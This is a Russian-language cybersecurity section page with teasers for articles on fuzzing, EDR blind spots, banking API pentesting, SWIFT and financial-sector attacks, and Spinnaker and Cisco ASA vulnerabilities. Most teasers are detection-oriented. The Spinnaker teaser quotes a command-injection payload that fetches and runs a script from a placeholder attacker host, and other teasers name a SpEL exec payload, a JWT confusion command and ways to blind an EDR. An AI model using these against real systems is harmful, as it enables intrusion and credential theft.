Кибербезопасность
По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.
Статья Фаззинг бинарных приложений: AFL++, libFuzzer и coverage-guided fuzzing на практике
23 уникальных crash-а за три месяца AFL++ против закрытого парсера. Coverage застрял на 2000 путей — правильные seed-ы вытащили на 3400+. 80% усилий не в ожидании crash-ей, а в работе с покрытием.AFL++ QEMU-mode для binary-only (1000–15000 exec/s с persistent mode), libFuzzer для source-based in-process фаззинга. CMPLOG перехватывает магические числа и подсказывает мутатору. Словарь из 40 токенов поднял покрытие с 18% до 52% за два часа. Decision tree: плато наступило — причина застоя → seed, словарь или ручной harness для непокрытой ветки.
Crash triage: afl-tmin минимизирует, Casr дедуплицирует по стеку. Маппинг ASan на CWE: heap-buffer-overflow (CWE-122) — высокая эксплуатируемость, null-dereference (CWE-476) — обычно DoS. Без анализа покрытия — работа вслепую, и persistent mode это не компенсирует.
Sydr-fuzz комбинирует символьное исполнение с AFL++ для глубоких путей.Статья Linux EDR изнутри: как агенты собирают телеметрию и где у них слепые зоны
eBPF-агент видит execve и connect, но пропускает ptrace-инъекцию в легитимный процесс. Три механизма сбора телеметрии Linux EDR — и у каждого своя слепая зона.eBPF (менее 2% CPU, ring buffer с 5.8+), auditd (монопольный режим или неполные данные, legacy с 2.6+), LKM (полный доступ, риск kernel panic). LD_PRELOAD hijacking — два из трёх коммерческих агентов пропустили. ptrace injection не создаёт нового процесса — execve-хук молчит. Отключение eBPF-программы через bpf(BPF_PROG_DETACH) с CAP_SYS_ADMIN ослепляет агент. CVE-2025-32463 в sudo (CVSS 9.3, CISA KEV) даёт root.
Falco (CNCF, real-time eBPF), osquery (SQL polling, short-lived процессы пропускает), Wazuh (legacy + auditd). Decision tree по инфраструктуре. Fingerprinting агента: ps aux, bpftool prog list, lsmod — три команды определяют стратегию evasion.
eBPF-rootkitы не закрывает ни один open-source HIDS.Статья Уязвимости банковских API: методология пентеста от разведки до эксплуатации
Один параметр в URL — баланс чужого счёта. Банк прошёл PCI DSS месяц назад, использовал OAuth 2.0 и API Gateway от крупного вендора. BOLA остаётся уязвимостью №1 уже который год.OWASP API Top 10: BOLA (подмена account_id в GET-запросе), BFLA (вызов /api/internal/refund с пользовательским токеном без проверки роли), race condition через single-packet attack в Burp — два одновременных списания до обновления баланса. JWT algorithm confusion: RS256→HS256 с публичным ключом через jwt_tool -X a.
WAF не видит BOLA и BFLA — запросы синтаксически легитимны. PCI DSS не проверяет, может ли User A увидеть баланс User B — буквально вне скоупа. Burp Autorize автоматизирует подстановку токенов. Decision tree: два аккаунта → BOLA/BFLA первыми, платёжные эндпоинты → race condition.
Shadow API (v1/ при живой v3/) — вектор без fraud-detection и rate limiting.Статья Кибератаки на финансовый сектор 2025–2026: TTPs, kill chain и detection-правила для SOC
43% рост атак на финансовый сектор России за 2025 год. Банкеры выросли в 4 раза, шифровальщики — максимум за два года, supply chain — 26% инцидентов. И каждый шаг выглядит легитимно.GodRAT через SCR с стеганографией, Cobalt Strike Beacon через DLL Hijacking легитимных утилит, FunkSec останавливает 50+ процессов до шифрования. AiTM обходит MFA как класс защиты. 68% инцидентов — фишинг, но GenAI ускоряет генерацию писем в 11,4 раза. Подрядчиков взломать проще и дешевле — 26% атак идут через supply chain.
Типовой kill chain от SCR-вложения до SWIFT-сегмента с маппингом T1566.001, T1027, T1562.001, T1486, T1657. Два Sigma-правила: запуск SCR из %TEMP% и остановка защитных сервисов. Корреляционная цепочка за 60 минут — три события по отдельности шум, три в цепочке — critical alert.
Оборотный штраф + выкуп = цена пропущенного инцидента в 2026 году.Статья Атаки на SWIFT и межбанковские системы: kill chain от фишинга до вывода средств
19 дней от spear-phishing до операторского АРМ SWIFT в банке из топ-30. Один сервисный аккаунт с правами на обе зоны превратил формальную сегментацию в декорацию.Bangladesh Bank — $81 млн за одну ночь, Lazarus модифицировал Alliance Access для подавления печати подтверждений. «Глобэкс» — первый SWIFT-вывод в России, Cobalt от initial access до вывода за 3-4 недели. Valid Accounts (T1078) с реальными credentials оператора: аутентификация выглядит легитимно — SIEM молчит.
Полный kill chain с маппингом MITRE ATT&CK: T1566.001 → T1056.001 → T1078 → T1565.002 → T1657. Два Sigma-правила: логин оператора вне рабочего времени и создание файлов в директории Alliance Access. Матрица контролей SWIFT CSP против каждой фазы — и почему CSP не защищает от атаки через офисный сегмент.
Cobalt и Lazarus приходят изнутри, а не из интернета.Статья Реагирование на инциденты информационной безопасности: от алерта до изоляции за 30 минут
Понедельник 9:15 — mass file encryption. Через 12 минут ещё три хоста. Атакующие сидели неделю, данные уже ушли. Разница между «под контролем» и «на DLS» — первые 30 минут триажа.75% вторжений используют валидные credentials, медианный dwell time — 11 дней, 57% организаций узнают от внешней стороны. Decision tree триажа: единичный алерт или кластер → маппинг TTPs на MITRE ATT&CK → критичность актива → lateral movement. Lateral movement — проверяйте первым, а не последним.
Три параллельных потока для определения масштаба: EDR-телеметрия, SIEM за 14 дней назад, NetFlow на beaconing. Memory dump — до любых действий. Chain of custody — SHA256 + UTC + ФИО аналитика. Sigma-правило на mass share access и минимальный detection-чеклист для SOC.
Главный вывод: decision matrix «кто нажимает isolate без согласования» важнее любого playbook.Статья Безопасность Infrastructure as Code: от мисконфигурации в Terraform до detection-правила в SIEM
Capital One, LA Times, Twilio — три инцидента, три мисконфигурации, которые ловятся checkov -d . за секунды. Четыре года IaC-сканирования в production: ни одна найденная проблема не добралась до прода.Пять категорий: публичный доступ (T1580), wildcard IAM (T1078.004), отсутствие шифрования (T1552.001), пробелы в логировании (T1562.008), избыточный сетевой доступ. Две стратегии: HCL-скан на этапе PR за секунды, план-скан перед apply — ловит динамические выражения и переменные. Checkov, Trivy, KICS, Terrascan — выбор по стеку.
Главная слепая зона: configuration drift. Разработчик добавил 0.0.0.0/0 через консоль — сканер молчит. CSPM + SIEM-правило на AuthorizeSecurityGroupIngress не от CI/CD role — второй эшелон. Suppression rate как метрика: 200 skip-аннотаций в репо — сканер стал формальностью.
Detection-чеклист CloudTrail событий с MITRE ATT&CK для SOC.Статья FIRESTARTER на Cisco ASA: как бэкдор переживает патчи
6 месяцев dwell time на пропатченном Cisco Firepower: патч закрыл дверь, а FIRESTARTER уже внутри. Graceful shutdown — момент, когда имплант прописывает автозапуск в CSP_MOUNT_LIST.UAT-4356 (ArcaneDoor): CVE-2025-20362 (PR:N, автоматизируема) + CVE-2025-20333 (CVSS 9.9, RCE) через WebVPN. FIRESTARTER живёт в LINA-процессе — show version, show running-config, syslog молчат. Magic packet через WebVPN активирует без эксплуатации CVE. Полностью пропатченное устройство доступно бессрочно.
CSP_MOUNT_LIST модифицируется при SIGTERM → boot восстанавливает её до чистого состояния. Firmware upgrade = graceful shutdown = имплант выживает. Удаляет только hard power cycle или полный reimage. IBM X-Force: среднее время устранения CVE — 29 месяцев. CISA дала один день.
CLI-команда для проверки + YARA IOC + decision tree при подозрении на компрометацию.Статья CVE-2026-32604 и CVE-2026-32613: RCE в Spinnaker — от low-priv аутентификации до shell на clouddriver и Echo
CVE-2026-32604 и CVE-2026-32613 в Spinnaker: CVSS 9.9, любая аутентифицированная учётка — shell на clouddriver с production AWS credentials. Один PUT /artifacts/fetch.branch конкатенируется в sh -c без санитизации: «main; curl attacker/sh.sh|sh;» — и clouddriver выполняет произвольный скрипт. GET /artifacts/credentials отдаёт список аккаунтов любому пользователю без проверки ролей. Echo использует SpEL без sandbox — T(java.lang.Runtime).getRuntime().exec() работает напрямую, Orca прикрыли whitelist'ом, Echo — нет.
Post-exploitation: credentials в YAML-конфиге plaintext, IAM-роль через instance metadata, ServiceAccount token → K8s API, trusted mesh к Orca/Fiat/Echo без аутентификации. Два хопа, ноль дополнительных кредов — от low-priv учётки до production-инфраструктуры.
Decision table двух векторов и Falco-правило для детекта shell-spawn из JVM.Статья Network Policies в Kubernetes: изоляция подов на практике
По умолчанию каждый под в вашем кластере видит все остальные - flat network без границ. Один скомпрометированный контейнер открывает атакующему полный доступ к production-сервисам, базам данных и внутренним API. Именно так выглядит lateral movement в реальных инцидентах.
В этой статье разберём, как Network Policies превращают хаотичную сеть кластера в управляемые сегменты: синтаксис и логику политик, почему стандартный K8s API - это только половина решения, и чем Calico с Cilium закрывают то, что ванильный Kubernetes не умеет. Практический разбор: GlobalNetworkPolicy и DNS-based rules в Calico, L7-фильтрация HTTP-трафика и identity-based security в Cilium, паттерны default deny и микросегментации - с реальными YAML-манифестами и командами для проверки.